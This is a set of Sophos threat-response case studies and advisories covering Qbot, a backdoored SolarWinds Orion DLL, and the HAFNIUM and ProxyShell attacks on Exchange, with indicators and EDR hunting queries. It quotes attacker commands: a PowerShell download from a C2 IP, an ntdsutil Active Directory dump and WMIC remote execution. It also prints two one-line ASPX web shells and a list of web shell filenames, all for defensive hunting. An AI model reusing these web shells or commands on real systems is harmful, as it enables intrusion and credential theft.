The Sophos Managed Threat Response (MTR) team provides customers with swift, human-led responses to the nastiest threats and most sophisticated adversaries.

The hunt begins

Sophos Audio on SoundCloud. Click to hear more from Greg Iddon about this story.

This case started with an email from a brand-new MTR customer. The customer had just heard that a third-party vendor they work with had been hit by ransomware and was worried they might also be affected.

The MTR team immediately picked up their request, opened a new case, and initiated a threat hunt. Within 15 minutes they were highly confident that there was no ransomware in the customer’s environment.

But the team did find something suspicious. Very recently, a script had been detected and blocked by the customer’s Sophos endpoint protection software.

What was odd was that it was in JavaScript which is typically used by websites to make them interactive. However, this detection wasn’t coming from a web browser – it was coming from the command line.

And it was obfuscated: someone didn’t want it to be read by human eyes.

Diving deeper

We sent the script to SophosLabs, our threat research and intelligence team, to get a deeper analysis of this script and what it was trying to do. Within minutes, SophosLabs began sharing actionable intelligence:

  • The script was a downloader. It would have tried to download a malicious payload hosted at a URL. A search across network traffic data reveals the URL was never connected.
  • The downloader script would have attempted to make a scheduled task.

While we couldn’t find any evidence of this task being created, we did find another suspicious-looking scheduled task that would run a different script.

This new script would attempt to find two files with the file extension .zzz and join them together into a .exe. It would then run this .exe, delete the scheduled task, delete the .zzz files, and finally delete the script.

This scheduled task was waiting to do its job but the files it was waiting for never appeared.

Situation resolved

The picture was clear. The suspect scripts and tasks belong to a variant of a banking trojan and information stealer known as Qbot. And had been running undetected on a device in the customer’s network for a very long time.

The criminals behind Qbot were trying to orchestrate the download of an update as two .zzz files in order to evade perimeter defenses, and then join them together once on the inside.

Unlucky for Qbot, we caught this process in the act.

As the customer had authorized Sophos to respond on their behalf, we cleaned up the Qbot infection, and informed the customer of what we had discovered.

The whole investigation, from the initial customer email to final clean up, took just 2 hours 6 minutes.

The customer was able to relax knowing that they hadn’t been affected by ransomware and that a historic banking malware had been fully removed.

And as this story shows, while ransomware is often the threat that is front of mind, it’s important to also be alert to the attacks that prefer to hide in the shadows.

Click image to expand

Learn more

For more information on the Sophos MTR service, speak with one of the security experts at Spear Shield today.

If you prefer to conduct your own threat hunts Sophos EDR gives you the tools you need for advanced threat hunting and IT security operations hygiene. Speak with the team at Spear Shield to start a 30-day no obligation trial today.

Uncovering a backdoor implant in a SolarWinds Orion server

A real-world story from the Sophos Managed Threat Response team
Written by 

Please note: Although elements of this story may seem connected to the recent SolarWinds Sunburst attack, we have not found any concrete evidence that these two incidents are related.

Customer profile: An internet service provider and telecommunications organization based in the USA with approximately 1700 devices.

The Sophos Managed Threat Response (MTR) team provides 24/7 threat hunting, detection, and response capabilities delivered by an expert team as a fully-managed service. Sophos Rapid Response provides emergency remote incident response for active incidents.

Setting the scene

The organization in question came to Sophos Rapid Response after falling victim to a Ragnar Locker attack in early 2020. A ransomware payload was delivered manually by a highly capable group at around 2 a.m., while admins were asleep, hitting as many computers as they could in quick succession.

They hit hundreds.

Sophos Rapid Response was brought in to help identify, contain and neutralize the threat. It took the team less than two days to resolve the active threat and over the following days incident responders were able to ascertain the threat actor had entered the network two months prior to the ransomware attack.

With the Ragnar group removed from their network, the customer transitioned to the full MTR service in Notify mode with our security operations team watching over them 24/7.

While the pressing threat of Ragnar Locker was out of the picture, in November 2020 another threat actor stepped into view…

Sneaking over WMI

Increasingly, threat actors like to pack light when on a mission. They don’t bring their own tools and prefer to “live off the land.” They take advantage of capabilities built into operating systems, like Microsoft Windows, to evade detection.

Windows Management Instrumentation, or WMI for short, is a feature that enables remote management and automation of administrative tasks. It’s designed to ease the pains of managing large enterprise environments with an overwhelming number of computers.

But in the hands of a threat actor, WMI offers quite the rich toolbox to achieve a number of wide-ranging goals. And with WMIC, the command line interface for WMI, adversaries can write simple yet powerful one-line instructions.

For example, running Notepad on a remote computer:

wmic /user:"username” /password:”password” /node:"" process call create “notepad.exe”

Or listing all the local user accounts on a computer:

wmic useraccount get /ALL /format:csv

Hunting for abuse of WMI is essential, but discerning the difference between legitimate use of WMI and malicious use is no easy task, often requiring a keen eye towards the context of the commands. What commands came before? What commands came after? What is the intent?

These are the questions our MTR operators ask themselves as a number of suspicious looking WMI commands are identified in the customer’s network, all taking place in quick succession, during a routine threat hunt alongside researchers from SophosLabs.

Hunting for threat actors

The threat hunters see the first red flag. WMIC was used to instruct remote computers to launch commands. This alone is suspicious, but where did the commands come from?

Looking at the hierarchy, wmic.exe was executed by cmd.exe, the Windows Command Prompt. And cmd.exe was executed by w3wp.exe, a worker process for Microsoft IIS – a web server.

A web server. Surely no measured admin would launch administrative commands to other servers from their own web server?

And what is going on in this command seen on the web server?

wmic /node: /user:"REDACTED" /password:"REDACTED" process call create "c:\Windows\Temp\backup.bat"

WMIC calls out to a remote computer, authenticated with credentials, to create a new process and execute a script called backup.bat. On its own, it’s not terribly suspicious. But given that this was initiated by a web server worker process, we need to dig deeper. What is backup.bat?

MTR finds another troubling command.

cmd /c "powershell (new-object system.net.webclient).downloadfile('http://98[.]225.248.37:8090/update','c:\users\public\update')"&exit

Combined with the context of the previous command, it is clearly suspicious to see PowerShell (another Microsoft task automation and configuration management tool) creating a webclient to “downloadfile” from an unknown host, a file called “update”.

Before continuing, an MTR operator sends the first notification to the customer and engages their admin team.

The operator shares the observed WMIC commands as well as the servers and users associated with the commands, with guidance to reset those user passwords and to use Sophos Intercept X to isolate the servers from the rest of the network. Additionally, that strange IP address needs blocking on their firewall.

On with the investigation.

Looking back in time to the preceding commands, the picture becomes clearer.

cmd /c "echo mkdir c:\windows\temp\tmp > \\\c$\Windows\Temp\backup.bat" 
cmd /c "echo ntdsutil "ac i ntds" ifm "create full C:\Windows\Temp\tmp" q q >> \\\c$\Windows\Temp\backup.bat"

That’s no backup command. A .bat file is a Batch script, the classic way of bundling Windows commands together rather than running each by hand.

Echo typically prints a line of text to the screen (i.e. the command terminal) however the > symbol is a redirect. Instead of writing the text mkdir … to the terminal, it’s writing to a file on a remote system.

The threat actor built a script on a remote computer. And they had run it.

First it creates a new “tmp” folder in the Windows temporary directory (where things are put when it doesn’t matter if they disappear later on). Next it uses ntdsutil.exe

To a veteran threat hunter, the threat actor’s goal is clear.

Credential access to elevate privileges

Ntdsutil is short for NT Directory Services Utility. It is a tool for interacting with Active Directory servers, Microsoft’s centralized suite of technologies responsible for authenticating and authorizing users and computers in a Windows domain.

The arguments "ac i ntds" ifm "create full …" writes a full dump, a copy, of the entire Active Directory database intended for the legitimate purpose of domain controller deployment using the “install from media” option.

This actor tried to get their hands on credentials, and that variant of the command is often used by threat actors who have access to the domain controller but don’t yet have domain admin credentials.

They tried to elevate privileges. And they were caught red-handed.

An operator gets back in touch with the customer to fill them in with the latest discoveries. The customer initiates domain-wide password resets. Better to be safe than sorry.

With the malicious IP blocked, all passwords reset, and those servers isolated, the threat actor is dead in the water.

But it is still a mystery how they orchestrated these commands. Where is the initial point of entry?

What did they do on that webserver?

Web shells

Public webservers are inherently risky. Not only do they face the internet, making them a prime target for an adversary’s initial intrusion into an organization’s network, it’s normal for them to communicate with a wide range of IP addresses never seen before.

All that web traffic, all that noise, makes web servers a wonderful place to hide and launch commands. Only a keen eye will spot that needle amongst the hay. Especially if you’re only looking at network traffic.

Thankfully, MTR collects endpoint telemetry as well as network telemetry, providing rich data to contextualize anything that might be found.

Looking over all the commands the threat actor ran on the server, a pattern emerges.

cmd /c "copy \\\c$\windows\temp\tmp\big.fm f:\sites\REDACTED\big.fm"

This command called out to a remote server to copy a file called big.fm from the tmp directory we saw earlier. Sadly, “Big FM” is not the name of the threat actor’s favorite Top 40 radio station, it’s what the threat actor named the Active Directory database dump.

What sticks out in this command, and many others they ran, is they only copied files to a particular folder on the webserver inside f:\sites\. Almost as if this was the only folder they had permissions to access. A folder where the website code resides.

This smells like a web shell.

Looking inside f:\sites\ our MTR operator finds a lonely looking file called about.aspx. Active Server Page Extended (ASPX) is a framework for writing dynamic websites. Taking a look over the code, our operator observes that the web page will receive encoded web requests and send the decoded request to cmd.exe, the Windows command prompt.

This is a web shell.

But why wasn’t it detected earlier?

Grabbing a copy of the file, MTR sends this immediately to SophosLabs for deeper analysis. Even as the file passes through our automated analysis systems, it’s clear this web shell variant has never been seen before. SophosLabs researchers quickly tear it apart and publish detections for this new variant, protecting all our customers around the globe from this web shell should it be used again.

At the time of writing this article we are the only vendor with a detection published for this web shell variant (detected as Troj/WebShel-H). The file hash is in the IOCs table at the bottom of this article.

With the web shell neutralized (hopefully along with the threat actor’s access), our operators move their focus to answering several important questions: Where did this web shell come from? What else was it used for? And what was the file update that the threat actor downloaded?


Scouring historic telemetry gathered by MTR since the service’s technology was deployed shows no signs of when the web shell was installed. Plenty of file accesses and timestamp modifications are observed, but it’s clear the web shell was deployed before Rapid Response had been engaged and our telemetry collection began.

This is a dead end.

Looking to what events preceded the download of the file update prove to be more fruitful albeit concerning including another request to a different C2 – http://216[.]243.39.167:8090/ – to fetch another version of the file.

The following command is observed:

cmd /c "copy \\\c$\inetpub\SolarWinds\orion\update \\\c$\inetpub\SolarWinds\bin\OrionWeb.dll /y"

Whatever update is, it has been used to replace a component of SolarWinds Orion called OrionWeb.dll.

Time to investigate this DLL.

DLLs are dynamic-link libraries, bundles of executable code that are called upon by applications, implementing various features and capabilities of an application. One can’t simply swap out a DLL with something completely different without causing an application to crash or throw lots of errors.

This needs expert eyes to investigate. MTR shares a sample with SophosLabs for reverse engineering and analysis.

This sample is not cryptographically signed, which is odd for a DLL purporting to be from a reputable vendor.

Digital signatures are a vital part of the trust model for Microsoft Windows. By using strong cryptography, these signatures enable both the authenticity of a file, confirming it is from who it says it is from, as well as the integrity of a file, confirming it has not been modified or corrupted in some way.

If someone were to modify this DLL, the digital signature would no longer validate the file integrity. But if the signature is entirely removed, there’s nothing to use to validate the file integrity at all.

MTR compares the file to a known-good copy of OrionWeb.dll and it is clear this file was and should be signed. Who removed the signature? And why?

OrionWeb.dll is a .NET assembly, written in C# (pronounced “C sharp”). C# is a Microsoft programming language that can easily take advantage of the capabilities of the .NET (“dotNET”) framework, and .NET is Microsoft’s powerful framework for writing applications for their platforms and interfacing with various Microsoft technologies.

One of the benefits of .NET assemblies is that they can be debugged and modified far easier than traditional compiled executables. One can open them up in a variety of tools like dnSpy and read and change the code they contain.

SophosLabs fully decompile the suspicious DLL and compare it to a known-good sample using the popular diff application WinMerge, a tool that enables file comparison and highlights the differences between them.

But as SophosLabs begin to dig into what had been changed, the changes seem incredibly minor. For instance, where the class of code LdapAuthentication previously inherited the other classes ILdapAuthentication and IDisposable in that order, the order was reversed in the suspicious sample.

Reviewing many of the other classes of code in the files, this same pattern of change is observed – parameters swapped around for no obvious reason. Anyone quick to run their eye over these changes would rightfully assume that the software developer has just refactored (i.e. reorganized) their code and nothing suspicious or malicious is present.

Yet given the context of how this file was discovered, SophosLabs and our operators push on with analyzing the sample to try and discover why this different DLL is so important to them that they needed to replace the original with it.

Eventually a discovery is made in the ValidateUser function (in SolarWinds.Orion.Web.OrionMembershipProvider). A chunk of code has been inserted. And it completely changes the behavior of the function.

This SolarWinds Orion server was backdoored!

A Hidden Backdoor

The original ValidateUser function was quite simple – it would be called with a username and password and then, behind the scenes, it would call another function called InternalValidateUser that would do the heavy lifting of authenticating the user.

However, the actor behind this threat added a lot of extra logic to the ValidateUser function.

First, a try/catch pattern was inserted on lines 5 and 54 with the catch block empty. This pattern ensures that any errors that may occur in the try block are suppressed and don’t cause the whole application to crash or print out errors that may reveal something is awry.

Next, a StreamWriter was added on line 7 which would write text to a seemingly randomly named file in the C:\Users\Default\AppData\Local\Temp\ directory. Any provided username and password would be written to the file, encrypted with a simple binary XOR and Addition cipher with hard coded keys.

The adversary wanted to continuously capture a stream of valid usernames and passwords for SolarWinds Orion.

After that, a conditional if statement was inserted on line 21 which looked for when the provided username is _system. A username that did not exist in the application’s database. A username only the adversary would know about.

Within the if statement were several instructions to access the application’s SQL database and delete the audit logs that would have revealed any usage of this _system username. The threat actor clearly had knowledge of how OrionWeb functions and how best to cover their tracks.

A text string was then constructed on line 57 and 58 that would take the number of days since epoch – a specific point in time which is counted upwards from to describe the current date/time. Effectively this string is the number of days since January 1st 1970. Around the number of days since epoch, 80CD1DB_ and _0F90D2 are added, e.g. 80CD1DB_42745_0F90D2.

But why would a dynamic text string be needed, one that changes every single day? The answer soon becomes clear.

The final modification was in the return statement on line 59.

The original statement would call the InternalValidateUser function. Inferring from the changes, this function would either return True or False (for either a successful or unsuccessful authentication). Yet the adversary had added two additional ways for the ValidateUser function to return True. If the password is this dynamic text string, or if the username is “_system” and the password is also the dynamic text string.

The adversary implanted a custom, dynamic password and username that only they would know about and ensured their usage of these credentials would never end up in the SolarWinds Orion audit logs.

And then another malicious injection is found.

Lurking in the GetLdapIdentity function (in SolarWinds.Orion.Web.OrionMixedModeAuth), SophosLabs discover the following code:

Similar to the StreamWriter observed above, the functionality intercepts credentials as they are being used by the application and encrypts and writes them to another seemingly randomly named file. But this time the adversary is stealing LDAP, Lightweight Directory Access Protocol, credentials which are used for authenticating with directory services like Microsoft Active Directory.

The adversary wanted to continuously capture a stream of valid usernames and passwords for the customer’s domain, not just for SolarWinds Orion.

Thankfully, the affected hosts are already isolated. MTR confirms with the customer that these hosts are taken offline and are rebuilt to ensure no backdoor remains in their network.

The Big Picture

The sequence of events is now clear:

  • The threat actor gained access to the web server and installed a web shell to send commands and orchestrate the rest of the attack
  • A backdoored version of OrionWeb.dll was downloaded from their C2 server. Additional logic was added to authenticate the username “_system” with a dynamic password that would change every day and the digital signature of the file removed.
  • OrionWeb.dll was replaced with their backdoored version.
  • Discovery was performed and domain controllers accessed to create a full dump of Active Directory to use for privilege escalation or to exfiltrate.

Given the recent supply chain attack on SolarWinds, this attack is certainly of note. However, we could not identify concrete evidence that the two are connected. The C2s, web shell, and DLL used in this attack are not ones we have observed before, outside of this single incident, nor have we observed them used since.

This style of attack is not specific to SolarWinds Orion and does not rely upon the exploitation of a vulnerability in its code. A threat actor can reverse engineer and maliciously modify a .NET assembly using freely available tools with no requirement for source code access.

The threat actor behind this attack is clearly highly skilled and capable. Their playbook of identifying viable .NET assemblies to backdoor underlines the importance of threat hunting, as well as application allowlisting and file integrity monitoring (both available in Sophos Intercept X Advanced for Server).

We hope the details shared through this casebook as well as the IOAs and IOCs below enable threat hunters around the globe to look for similar malicious modifications of OrionWeb.dll and other .NET assemblies, which will aid in better protection for all.

Learn more

For more information on the Sophos MTR service, speak with one of the security experts at Spear Shield.

If you prefer to conduct your own threat hunts Sophos EDR gives you the tools you need for advanced threat hunting and IT security operations hygiene. Speak with the team at Spear Shield to start a 30-day no obligation trial today.


Description Indicator
Web shell SHA256 (about.aspx) f39dc0dfd43477d65c1380a7cff89296ad72bfa7fc3afcfd8e294f195632030e
Sophos detection for web shell Troj/WebShel-H
C2 IPv4s
Backdoored OrionWeb.dll SHA256 a25fc5af86296dcd5bb41668443a36947bccd17a1687f9b118675f1503b3e376
Sophos detection for .dll Mal/Generic-S + Troj/MSIL-QJK



ID Tactic Technique
T1047 Execution Windows Management Instrumentation
T1059.001/.003 Execution Command and Scripting Interpreter
T1505.003 Persistence Server Software Component: Web Shell
T1554 Persistence Compromise Client Software Binary
T1078.002 Privilege Escalation Valid Accounts: Domain Accounts
T1070.004/.006 Defense Evasion Indicator Removal on Host
T1003.003 Credential Access OS Credential Dumping: NTDS
T1556 Credential Access Modify Authentication Process
T1087.002 Discovery Account Discovery: Domain Account
T1570 Lateral Movement Lateral Tool Transfer
T1056.003 Collection Input Capture: Web Portal Capture
T1071.001 Command and Control Application Layer Protocol: Web Protocols
T1571 Command and Control Non-Standard Port


Intercept X EDR

Live Discover Query

Peter Mackenzie: In Sophos Rapid Response, we would use the query below to get started, this has 3 variables (begin, end, cmd) so you can set the date range you are looking at as well as the command you are looking for. For you example you might start by looking for the string: % wmic /user:"%”%

Allowing for a wildcard at the start and end, as well as for any username. This would likely bring back any results where wmic was being used with someone’s credentials. The query itself brings back lots of useful information from our journals, including when the file was created, and which user executed the command.

CAST(strftime('%Y-%m-%dT%H:%M:%SZ',datetime(spj.time,'unixepoch')) AS TEXT) DATE_TIME,
strftime('%Y-%m-%dT%H:%M:%SZ',datetime(f.btime,'unixepoch')) AS First_Created_On_Disk,
strftime('%Y-%m-%dT%H:%M:%SZ',datetime(f.ctime,'unixepoch')) AS Last_Changed,
strftime('%Y-%m-%dT%H:%M:%SZ',datetime(f.mtime,'unixepoch')) AS Last_Modified,
strftime('%Y-%m-%dT%H:%M:%SZ',datetime(f.atime,'unixepoch')) AS Last_Accessed,
strftime('%Y-%m-%dT%H:%M:%SZ',datetime(spj.processStartTime,'unixepoch')) AS Process_Start_Time,
CASE WHEN strftime('%Y-%m-%dT%H:%M:%SZ',datetime(spj.endTime,'unixepoch')) = '1970-01-01 00:00:00'
THEN '-' ELSE strftime('%Y-%m-%dT%H:%M:%SZ',datetime(spj.endTime,'unixepoch')) END AS Process_End_Time,
FROM sophos_process_journal spj
JOIN file f ON spj.pathname = f.path
JOIN users u ON spj.sid = u.uuid
WHERE spj.time >= CAST($$begin$$ AS INT)
AND spj.time <= CAST($$end$$ AS INT)

AND spj.cmdline LIKE '$$cmd$$';


I would like to thank (in no particular order) Fraser Howard, Guido Denzler, Gabe Renfro, Jordon Carpenter, Tyler Wojcik, Jordan Konicki, Steven Lott, Mat Gangwer, Alemdar Halis, and Savio Lau for their efforts in detecting, investigating, and responding to this novel threat.

Nation-State HAFNIUM attack stopped

Written by 

Update: Microsoft released new security updates for Exchange Server on April 13th (CVE-2021-284802848128482, and 28483).  The updates address bugs reported to Microsoft by the NSA and are considered urgent fixes that should be addressed immediately.

On March 2nd, zero-day vulnerabilities affecting Microsoft Exchange were publicly disclosed. These vulnerabilities are being actively exploited in the wild by HAFNIUM, a threat actor believed to be a nation state.


What is HAFNIUM?

According to a CISA alert:

Microsoft has released out-of-band security updates to address vulnerabilities affecting Microsoft Exchange Server 2013, 2016, and 2019. A remote attacker can exploit three remote code execution vulnerabilities—CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065—to take control of an affected system and can exploit one vulnerability—CVE-2021-26855—to obtain access to sensitive information. These vulnerabilities are being actively exploited in the wild.

CISA also issued an emergency directive urging organizations to patch on-premises Exchange Servers and search their networks for indicators of attack.

For an overview of HAFNIUM, and advice on how you should respond, watch this short video from Mat Gangwer, the head of the Sophos Managed Threat Response (MTR) team.

For a deep dive into HAFNIUM and the steps you can take to address the threat, watch our recent webinar session:


For details of the Sophos protections against the exploitation of these vulnerabilities, click here.

UPDATE: Other threat actors are now taking advantage of the persistence established by Hafnium to conduct a range of attacks. One actor is installing a new ransomware variant called DearCry.

It is important to note that patching only protects your organization from being exploited by the vulnerabilities going forward.  It does NOT ensure that an adversary has not already exploited the vulnerabilities.

What should you do?

1. Patch or disable

Patch all on-premise Microsoft Exchanged servers in your environment with the relevant security update. Details can be found on Microsoft’s Exchange Team blog.

If you are unable to patch, implement an IIS Re-Write Rule and disable Unified Messaging (UM), Exchange Control Panel (ECP) VDir, and Offline Address Book (OAB) VDir Services. Details can be found in the Microsoft’s Security Response Center blog.

Sophos recommends you backup Exchange IIS/Server logs before patching and updating.

2. Determine possible exposure

Download and run the Test-ProxyLogon.ps1 script provided by the Microsoft Customer Support Services team to determine possible exposure. Details on interpreting the results of this script can be found in this Microsoft article, a few paragraphs into the “Have I been compromised?” section).

It is important to note that even with the patches installed, this will not address the presence of any malicious web shells. It is for this reason we recommend the use of Microsoft’s script to identify affected servers and look for the presence of web shells.

Test-ProxyLogon.ps1 can output multiple .csv files per Exchange server, depending on what it finds. These .csv files can be viewed in a text editor or spreadsheet application.

The script will look for evidence of each vulnerability being abused, creating a .csv per CVE. It will also look for suspicious files (which may be web shells) which should be reviewed, and calculate how many days back in the logs it can identify potential abuse of the vulnerabilities.

Our most common observations are related to output for CVE-2021-26855.

Hosts that may have been exploited by CVE-2021-26855 will be listed in the file [HOSTNAME]-Cve-2021-26855.csv

The “ClientIpAddress” column will list the source IP addresses of potential attackers.

The “AnchorMailbox” column will list a path to various applications running on Exchange that may have been targeted. To reveal what actions may have been taken by the attacker, you will need to extract the relevant application from AnchorMailbox.
e.g. for “ServerInfo~a]@[REDACTED]:444/autodiscover/autodiscover.xml?#” the relevant application is /autodiscover/

To determine what actions were taken by the adversary, you will need to look at the logs in %PROGRAMFILES%\Microsoft\Exchange Server\V15\Logging\{application}
e.g. %PROGRAMFILES%\Microsoft\Exchange Server\V15\Logging\autodiscover\

The “DateTime” column in [HOSTNAME]-Cve-2021-26855.csv will provide you with a timestamp when the potential exploitation took place, to use when referencing the log files.

3. Look for web shells or other suspicious .aspx files.

Web shells have been observed in the following directories:

    • <volume>\inetpub\wwwroot\aspnet_client\
      • e.g. C:\inetpub\wwwroot\aspnet_client\
    • <volume>\inetpub\wwwroot\aspnet_client\system_web\
    • <exchange install path>\FrontEnd\HttpProxy\owa\auth\
      • e.g. C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\
    • <exchange install path>\FrontEnd\HttpProxy\owa\auth\Current\
    • <exchange install path>\FrontEnd\HttpProxy\owa\auth\<folder with version number>\

Common names for these web shells include:

  • (8 random letters and numbers)
    • Regex: [0-9a-zA-Z]{8}.aspx
  • aspnet_client.aspx
  • aspnet_iisstart.aspx
  • aspnet_www.aspx
  • aspnettest.aspx
  • discover.aspx
  • document.aspx
  • error.aspx
  • errorcheck.aspx
  • errorEE.aspx
  • errorEEE.aspx
  • errorEW.aspx
  • errorFF.aspx
  • healthcheck.aspx
  • help.aspx
  • HttpProxy.aspx
  • Logout.aspx
  • MultiUp.aspx
  • one.aspx
  • OutlookEN.aspx
  • OutlookJP.aspx
  • OutlookRU.aspx
  • RedirSuiteServerProxy.aspx
  • shell.aspx
  • shellex.aspx
  • supp0rt.aspx
  • system_web.aspx
  • t.aspx
  • TimeoutLogout.aspx
  • web.aspx
  • web.aspx
  • xx.aspx

4. Query with Sophos EDR

If you are using Sophos EDR, you can leverage the following example queries to identify potential web shells to investigate, check patch level of your servers, and look for suspicious commands from child processes of w3wp.exe (a Microsoft’s IIS web server worker process, used by Exchange).

/* Query for known web shell names */
datetime(btime,'unixepoch') AS created_time,
size AS fileSize,
datetime(atime, 'unixepoch') AS access_time,
datetime(mtime, 'unixepoch') AS modified_time
FROM file
(path LIKE 'C:\inetpub\wwwroot\aspnet_client\%' OR path LIKE 'C:\inetpub\wwwroot\aspnet_client\system_web\%' OR path LIKE 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\%')
AND filename IN ('web.aspx','help.aspx','document.aspx','errorEE.aspx','errorEEE.aspx','errorEW.aspx','errorFF.aspx','web.aspx','healthcheck.aspx','aspnet_www.aspx','aspnet_client.aspx','xx.aspx','shell.aspx','aspnet_iisstart.aspx','one.aspx','errorcheck.aspx','t.aspx','discover.aspx','aspnettest.aspx','error.aspx','RedirSuiteServerProxy.aspx','shellex.aspx','supp0rt.aspx','HttpProxy.aspx','system_web.aspx','OutlookEN.aspx','TimeoutLogout.aspx','Logout.aspx','OutlookJP.aspx','MultiUp.aspx','OutlookRU.aspx');
/* Query for web shells with randomized 8 character names */
datetime(btime,'unixepoch') AS created_time,
regex_match(filename, '[0-9a-zA-Z]{8}.aspx', 0) AS filename,
size AS fileSize,
datetime(atime, 'unixepoch') AS access_time,
datetime(mtime, 'unixepoch') AS modified_time
FROM file
WHERE (path LIKE 'C:\inetpub\wwwroot\aspnet_client\%' OR path LIKE 'C:\inetpub\wwwroot\aspnet_client\system_web\%' OR path LIKE 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\%');

When reviewing the potential web shells identified by the queries, the web shell will typically appear inside an Exchange Offline Address Book (OAB) configuration file, in the ExternalUrl field. E.g.

ExternalUrl : http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["key-here"],"unsafe");}</script>
ExternalUrl: http://g/<script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath("error.aspx"));}}</script>

5. Establish impact

Review process activity and command executions from the time the web shell was created, onwards. Investigate w3wp.exe (the IIS web server worker process) activity and any instances of csc.exe (C# compiler) running as a child process. This should gleam trailheads to establish impact. The following Sophos EDR Live Discover query will aid you indentifying activity of this nature.

/* MULTI - Query for patch level, web shells, and suspicious commands */
SELECT '----------------------' Test, '----------------------' Result, '----------------------' Evidence UNION ALL
-- Check the version of Exchange that is running, to determine if it's patched
'Check Exchange Version to confirm Patch' Test,
CASE product_version
WHEN '15.0.1497.12' THEN 'Patched'
WHEN '15.1.2106.13' THEN 'Patched'
WHEN '15.1.2176.9' THEN 'Patched'
WHEN '15.1.2242.4' THEN 'Patched'
WHEN '15.2.721.13' THEN 'Patched'
WHEN '15.2.792.10' THEN 'Patched'
WHEN '15.2.858.5' THEN 'Patched'
END Result,
'Product_Version: ' || Product_version Evidence
FROM file
WHERE path = ( (SELECT data FROM registry
WHERE key = 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ExchangeServer\v15\Setup' AND path = 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ExchangeServer\v15\Setup\MsiInstallPath'
)||'bin\Microsoft.Exchange.RpcClientAccess.Service.exe')UNION ALL
-- Identify common webshells which which may exist. Files with creation dates after Feb 28, 2021 should be reviewed.
'List of Suspect Web Shell files (if any).' TEST,
CAST(GROUP_CONCAT(filename || CHAR(10)) AS TEXT) Result,
CAST(GROUP_CONCAT('PATH: ' || path || CHAR(10) || 'CREATED ON: ' || DATETIME(btime,'unixepoch') || CHAR(10)) AS TEXT) Evidence
FROM file
WHERE (path LIKE 'C:\inetpub\wwwroot\aspnet_client\%' OR path LIKE 'C:\inetpub\wwwroot\aspnet_client\system_web\%' OR
path LIKE 'C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\%') AND
(filename IN ('web.aspx','help.aspx','document.aspx','errorEE.aspx','errorEEE.aspx','errorEW.aspx','errorFF.aspx','web.aspx',
'OutlookJP.aspx','MultiUp.aspx','OutlookRU.aspx') OR
(LENGTH(filename) = 13) )UNION ALL
-- Identify the common pattern for commands being executed from a webshell. This is looking over the last (15 days), but can be adjusted.
'Suspicious Commands Detected as Child Process' TEST,
'Found a Suspicious Command Which Could Have Spawned from a Web Shell' Result,
DateTime(time, 'unixepoch') || ',' ||sophosPID || ',' || processname || ',' || cmdline Evidence
FROM sophos_process_journal spj WHERE LOWER(spj.processname) IN ('cmd.exe','powershell.exe', 'csc.exe') AND time > strftime('%s','now','-15 days') AND
(SELECT LOWER(processname) FROM sophos_process_journal spj2 WHERE spj2.sophosPID = spj.parentSophosPID) IN ('w3wp.exe', 'umworkerprocess.exe')

How Sophos Managed Threat Response (MTR) can help

Threat such as HAFNIUM are a great example of the peace of mind you get knowing your organization is backed by an elite team of threat hunters and response experts.

When the HAFNIUM news broke, the Sophos MTR team immediately began to hunt and investigate in customer environments to determine if there was any activity related to the attack. Additionally, they also looked to uncover any new artifacts or IoCs related to the attack that could provide further protection for all Sophos customers.

The 24/7 nature of Sophos MTR meant that not a single second was wasted before the team got to work, ensuring our customers were protected.

SophosLabs has also published detections related to the known activity and IOCs related to the Exchange vulnerability. This is in addition to previous protections already in place to detect post-exploit activity.

Concerned about HAFNIUM? Contact the team at Spear Shield today to ensure that any potential adversarial activity in your environment is identified and neutralized.

Being Proactive with ProxyShell

ProxyShell vulnerabilities in Microsoft Exchange: What to do

The vulnerabilities lie in the Microsoft Client Access Service (CAS), which is commonly exposed to the public internet. This exposure has led to widespread exploitation by threat actors.
Written by 

Last updated 2021-09-23 UTC 11.26


Threat actors are actively scanning and exploiting vulnerable Microsoft Exchange servers that have not applied security patches released earlier this year.

ProxyShell, the name given to a collection of vulnerabilities for Microsoft Exchange servers, enables an actor to bypass authentication and execute code as a privileged user.

ProxyShell comprises three separate vulnerabilities used as part of a single attack chain:

  • CVE-2021-34473
    Pre-auth path confusion vulnerability to bypass access control
    Patched in KB5001779, released in April
  • CVE-2021-34523
    Privilege elevation vulnerability in the Exchange PowerShell backend
    Patched in KB5001779, released in April
  • CVE-2021-31207
    Post-auth remote code execution via arbitrary file write
    Patched in KB5003435, released in May

The vulnerabilities lie in the Microsoft Client Access Service (CAS) that typically runs on port 443 in IIS (Microsoft’s web server). CAS is commonly exposed to the public internet to enable users to access their email via mobile devices and web browsers. This exposure has led to widespread exploitation by threat actors who are commonly deploying web shells to remotely execute arbitrary code on compromised devices, similar to that seen in the HAFNIUM attack.

What should you do?

Watch the video above as Mat Gangwer, head of the Sophos Managed Threat Response (MTR) team, shares details about the threat and offers advice about how to respond.

If you are using Microsoft Exchange server:

  1. Backup Exchange IIS/Server logs and ensure you have applied the July 2021 security updates for Microsoft Exchange
    • Patching only ensures that the vulnerability cannot be further exploited. If you have already been breached, the software patches do not address post-exploit behavior by a threat actor
  2. (For non Sophos MTR customers) Identify and investigate your exposure windows for adversarial activity
    • Identify and delete web shells and malicious binaries
    • Review process activity for instances of w3wp.exe
    • Identify and remove any persistence established by an actor
  3. Ensure endpoint protection is deployed on all endpoints and servers. Verify that all protections have been enabled and your exclusions are kept to a minimum

Sophos detections

Sophos customers are protected by multiple detections for the exploitation of these vulnerabilities. They can be used by threat hunters to perform searches in their own environments. Detections include:

  • Troj/ASPDoor-Y (detects malicious PST files)
  • Troj/ASPDoor-AF (detects malicious PST files)
  • Troj/Agent-BHPF
  • Troj/Agent-BHQD (detects the binary component of LockFile ransomware)
  • Troj/WebShel-M
  • Troj/KillAV-IT
  • App/HamaKaze-A
  • App/HamaKaze-B
  • CXmal/WebAgnt-A (detects malicious PST files in the context of customers’ environments)

SophosLabs has also published IPS signatures:

CVE Sophos XG/ Sophos Firewall EIPS SG UTM
